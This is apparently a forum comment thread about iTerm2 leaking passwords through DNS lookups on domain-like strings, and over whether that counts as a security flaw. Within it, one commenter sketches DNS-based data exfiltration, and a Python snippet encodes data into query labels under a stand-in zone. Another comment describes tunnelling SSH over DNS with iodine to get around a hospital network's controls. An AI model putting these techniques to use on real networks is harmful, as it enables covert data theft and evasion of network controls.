How does this coincide with the 3.1.1 release though? I was still on 3.0.15 and there are new features and other fixes in 3.1.x. Do the new features and the other fixes happen to be reasonably tested and ready already?
This is a deeply unkind thing to say to someone who donates their free time to provide a public good. George apologized for his oversight and fixed the problem. Take him at his word and thank him.
Uhh, to be fair both reports were answered with appropriate concerns.
The first made it sound like a very specific issue for that one user, and he was given a way to disable it.
The second made it sound like an entire class of users would need it off, and an option switch was provided.
What do you think is more probable, that he intentionally left that hole open despite not directly benefitting from it, or simply that when he answered both original reports and provided an appropriate solution, he didn't fully think about the details and implications of what those issues meant?
Have you really never had a closed issue come back to you with "went from bad to worse, abort!"?
Don't beat yourself up too much over it. Yes, this was a serious security issue from my point of view. BUT to be honest I would probably have made the same mistake, and your reaction time was more than adequate.
Thanks for the amazing job you are doing on iTerm; it's a joy to use.
Just want to say a personal thank you for your work on it and for the quick response. iterm2 is truly one of those apps I can't believe I get to use for free - thank you.
This kind of response is amazing. Mistakes happen; it's the response and the resolution that matter. I was already a happy user. I am now even more so. Well done.
That Google one uses a similar naming scheme to the servers used for video data for YouTube etc.
You just made me realize something, though. The Google and AWS examples you gave won't be able to do this, but if you set up wildcard DNS and tell DNS that you have your own nameserver via CNAME aliasing, you could make your software do a lookup for, e.g., something like "bm9ib2R5IHdpbGwgZXZlciBub3RpY2UgaWYgSSB0cmFuc21pdCBkYXRhIGxpa2UgdGhpcyEKCg.example.com" and exfiltrate data via DNS requests in the process. The server could then return 127.0.53.53 to mean "ACK; data received OK", whereas NXDOMAIN or any other error would mean to try again.
Hmmmmm. Wondering if I should delete this...
(I realize this is exactly how the Iodine DNS tunnel works. FWIW, freedns.afraid.org's free options are perfectly capable of getting iodine working, as I was very pleased to discover.)
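The scheme described above is easy to prototype. Here is a minimal sketch of the sender's encoding side, assuming a hypothetical attacker-controlled zone (`example.com` stands in for it) and the 127.0.53.53 ACK convention from the comment; the function and constant names are this sketch's own, not part of any real tool:

```python
import base64

# Hypothetical sentinel the cooperating nameserver returns to mean "data received OK".
ACK_IP = "127.0.53.53"

def encode_chunk(data: bytes, domain: str = "example.com") -> str:
    """Pack a chunk of data into DNS-safe labels under a controlled zone.

    Base32 is used because DNS names are case-insensitive in practice
    (resolvers may even randomize case in transit), so base64 would be lossy.
    """
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    # Each DNS label is limited to 63 bytes, so split the payload accordingly.
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    return ".".join(labels + [domain])

def is_ack(resolved_ip: str) -> bool:
    """Interpret the A-record answer: the sentinel IP means ACK; anything
    else (or NXDOMAIN, handled by the caller) means retry."""
    return resolved_ip == ACK_IP

name = encode_chunk(b"secret")   # "onswg4tfoq.example.com"
```

Resolving `name` through any recursive resolver delivers the payload to the zone's authoritative server, which is the whole trick: the victim network only ever sees ordinary DNS traffic.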
I know several people who use these sorts of techniques to exfiltrate data from a network where you don't have outbound TCP but you can leak information through DNS. As you mentioned, Iodine lets you do this (though by default it tries to use NULL DNS responses, which are blocked by a lot of networks).
It's pretty cool being able to do an rsync-over-DNS.
> NULL DNS responses, which are blocked by a lot of networks
For ages I've been meaning to [figure out how to] report this to the iodine dev, but I actually set up iodine specifically to get a working network while I knew I'd briefly be visiting a hospital.
I discovered to my amusement that the (public!) hospital's IT infra is really, really good. I was trying to SSH directly on top of the iodine tunnel, and while the first few DNS requests associated with connection setup would work and I'd get as far as a shell prompt, everything would screech to a halt and jam up almost instantly after that; maybe I'd get a single character typed, then it would completely die. I figured I was looking at a remarkably well-put-together leaky-bucket implementation.
So I tried hacking usleep()s into likely-looking spots in the code, but that didn't seem to slow it down enough. iodine is a rather interesting program internally, and a quick overview while distractedly sitting in a waiting area wasn't sufficient to figure out why my changes weren't throttling it as much as I expected.
Before this "production" test, I had verified that iodine was working by running the client on an AWS box. IIRC, ping ran over the link for quite some time (many minutes, though less than an hour) without a single hitch.
On another note, I found that iodine seemed utterly incapable of setting up a correctly configured tunnel on my Arch (receiving/server) box; I always had to ifconfig the tunnel interface (I forget exactly how) to make it work. The problem was that my ifconfig-ing only routed one specific IP address, while iodine wanted to give each connection its own discrete IP, and old sessions that locked up would take a while to time out. So I made a gigantic hack-script that would kill iodine every 1.5 minutes if it didn't see an authenticated SSH login. It would be nice for everything to just work properly...
I woke up in the middle of the night, seized by the realization that this meant that Adobe knows, down to the half-minute resolution, when I am using my computer (to do anything).
I've been running this command on my mac for over 10 minutes, trying different stuff, nothing. Also tried "sudo tcpdump -i any -s 0 -n port 53 -v". What's going on?
At least with the AWS ELB ones, the names can't be wildcards, so the only information that can be transmitted is info that the other party had set up ahead of time. 'gzunified-ecselast-1isehuisml2g4-663788831' is actually in someone's ELB list somewhere.
EDIT: For those who want to know how to determine that in the future, hit a generic ELB hostname with SSL and you should get the cert mismatch warning back with details.
I recently switched back to Terminal.app due to poor performance in iTerm 2. Keystrokes were lagging to the point it got frustrating. Then a few days ago someone pointed out that I should try the iTerm 2 nightly build, and sure enough the lag is gone, so I'm now back on iTerm 2 again.
It never ceases to amaze me how otherwise intelligent people think it's a good idea to send unencrypted user data to random servers on the internet in the background.
Come on, it's doing domain lookups, it's not sending social security numbers to Russia. The amount of hyperbole regarding this misfeature is absurd. It was something that maybe should have been better expressed but this is not some kind of massive security failure.
It doesn’t matter what the code intends to do. Sure, looking up strings that look like domains seems harmless.
But it means that every string that looks like a domain is transmitted unencrypted over the internet.
If your software deals with private user data, you must consider the side effects of every API you are calling. You can’t just transmit data somewhere and hope that everyone will do the right thing. Network traffic is monitored on lots of networks. Unless the data is encrypted and you have reason to trust the receiver, don’t send it.
And whatever you do, don’t send private data without user action. Users expect web requests to be made when clicking a link. They do not expect data to be transmitted when hovering the mouse over URLs.
It absolutely matters what the code intends to do. If it intends to do a DNS lookup, and does that, it's working properly, especially if it's doing a DNS lookup on what its regex says looks like a clickable URL. If it means to store an SSN in an encrypted DB and accidentally writes it to plaintext or sends it to Twitter, that's a security flaw. If that same app is following the system-standard method of doing DNS resolution, what else should it do? Are you really suggesting that it should somehow encrypt a DNS lookup? Why should this app be held to a higher standard than every single other application that does DNS lookups? This is the absurdity I'm talking about.
I completely agree that one must take into account how that feature fits with your product, user expectations, and privacy, but none of that means a feature that works as intended is a security flaw.
As others have said, prefetching pages has been done for years. Checking to see if it's a valid domain isn't an unreasonable feature for iTerm's URL highlighting, and for those who would prefer it didn't, he's changed that behavior. But let's not pretend that it was some absurd use of data that no one could have reasonably predicted.
And lastly, let's also stop clutching our pearls about "transmitting data". It did a DNS lookup, and while technically that means there was a transmission, it wasn't taking what people traditionally call user data and transmitting it to a foreign third party. It's perfectly reasonable to check a domain name against a DNS server. Maybe unwanted, yes, but not even remotely irrational or irresponsible.
This wasn't an accident; it deliberately looked up domain-looking strings against a DNS server. Don't patronize me: going by your Twitter picture, I've been at a command shell longer than you've been alive, and I damn well know the difference. I also know that doing DNS lookups (to the user's chosen DNS server, rather than some secret one) on domain-name-looking data isn't evil or completely unreasonable. He should have made it clear and opt-in rather than opt-out as it was, but by no means was this a vulnerability. If the user can't trust their domain server with domain-like data, they shouldn't use that server.
> What happened: iTerm sent various things (including passwords) in plain text to my ISP's DNS server
iTerm was accidentally transmitting passwords in plain text via the network.
I'm pretty sure transmitting passwords in plain text isn't "working as intended".
Sure, you can go blame the user for not knowing that iTerm makes DNS queries when you hold down the command key.
But if you want to make secure software, you can't just tell the user it's their fault. You need to make sure that accidentally disclosing private information is not something that easily happens.
You're purposefully ascribing intent to software. It didn't send passwords; it sent strings that looked like a domain to a regex. It did not send a message to a DNS server saying "Hey DNS server, this is a password!" The user happened to be using that string as a password.
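The distinction is easy to see with a toy pattern. A minimal sketch, assuming a hypothetical "looks like a domain" regex (this is purely illustrative, not iTerm2's actual pattern): the regex only sees shape, not meaning, so a random password containing a dot matches just as well as a real hostname.

```python
import re

# A toy "looks like a domain" pattern -- purely illustrative, NOT the
# regex iTerm2 actually used: one or more dot-separated alphanumeric labels.
DOMAIN_LIKE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.IGNORECASE)

def looks_like_domain(s: str) -> bool:
    """Return True if the string has the *shape* of a hostname."""
    return bool(DOMAIN_LIKE.match(s))

looks_like_domain("example.com")  # True: a real hostname
looks_like_domain("Xq3.f9Lw2")    # True: a random password that happens to contain a dot
looks_like_domain("hunter2")      # False: no dot, so no lookup would ever fire
```

Whether the third case is "sending a password" or "resolving a candidate hostname" depends entirely on what the user meant by the string, which is exactly the information the program doesn't have.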
It makes me scared to be an iTerm2 user, frankly. Because I am an idiot, it never occurred to me that I'd have to wonder about the security implications of my choice of terminal emulator. Does it otherwise have a good reputation for security?
iTerm2 is great and George is absolutely responsive with any issue I've ever brought up. I am personally going to give him the benefit of the doubt here, I'm sure he'll fix things ASAP.
I don't think it's worth throwing the baby out with the bathwater. But this should at a minimum be an opt-in feature, and not opt-out. Better yet, it's probably not needed. I've almost never needed to interact with URLs in a clickable way via a terminal.
Clickable URLs are very convenient. I have plenty of code that runs on remote machines and generates data that I'd like to view in my browser. Print the URL out, and I can click on it to open it up.
n.b. for me, in iTerm2, I have to press cmd to make the links highlight before I can click on them - so there's little danger of accidentally opening something you didn't want to.
Doing any DNS before clicking on the links seems like overkill, though. My browser can tell me if the URL is garbage or not.
The author has fixed it, and clearly this has been an educational experience. Considering the professionalism of the rest of the app, I get the impression that the author is likely going to factor security considerations into the picture in a big way in the future.
One of the nice things about GitLab instead of GitHub is that there isn't a flood of low-information, high-anger comments once a thread makes the HN front page.
What's more interesting to me is that some people are okay with a lookup on click but not a lookup on hover. It seems a difference in affirmative intent exists between hover and click; and more generally perhaps categories of user actions should be formalized into degrees of affirmation that could mitigate errors like this.
If I use iTerm's autocopy feature (i.e. selected text automatically goes to the clipboard) and rarely press CMD+C, am I safe? Or should I start changing my passwords? I usually generate passwords with `pwgen`, then copy with a double click.
Wow, this reminds me of how Cisco routers automatically try to telnet to anything that isn't a recognized command. (I may be mis-remembering part of this.)
This throws out behaviour that some people find desirable (for example https://news.ycombinator.com/item?id=15288935), whereas it is possible to keep that behaviour without the privacy violations.
It's a shame DNS traffic isn't at least encrypted. That doesn't solve the whole problem (you're still sending data to a potentially untrusted DNS server) but it'd help a little.
A local firewall (Hands Off and Little Snitch are handy commercial ones for Mac) will help you catch these kinds of info leaks (I caught this one a long time ago because of mine).
It does come with a time cost, however: little popups every time you launch a new application or connect to a new service, which you have to evaluate and handle since you haven't set rules for them already.
But I do distinctly remember getting alerts for this and being annoyed enough to go figure out how to disable the feature in iTerm2 (it was at least a couple of years ago, so my memory is hazy).
Maybe someone with more recent experience can clear up the mystery for us. =)
You said it right: it can help defend. On the other end of your dnscrypt tunnel, the queries will still go out unencrypted. They will just be harder to correlate to you specifically.